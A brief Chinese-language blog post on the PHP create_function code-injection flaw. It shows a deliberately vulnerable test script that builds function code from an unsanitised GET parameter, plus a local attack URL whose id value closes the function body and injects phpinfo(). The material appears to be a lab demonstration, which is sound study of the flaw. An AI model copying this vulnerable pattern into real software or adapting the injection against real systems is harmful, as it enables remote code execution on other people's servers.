create_function函数注入漏洞
2020-04-10 本文已影响0人
草莓养殖户
测试代码:
<?php
//02-8.php?id=2;}phpinfo();/*
$id=$_GET['id'];
$str2='echo '.$a.'test'.$id.";";
echo $str2;
echo "<br/>";
echo "==============================";
echo "<br/>";
$f1 = create_function('$a',$str2);
echo "<br/>";
echo "==============================";
?>
攻击方式:
http://127.0.0.1/test.php?id=2;}phpinfo();%23 (这个也可以,图中也可以,道理都是一样的)
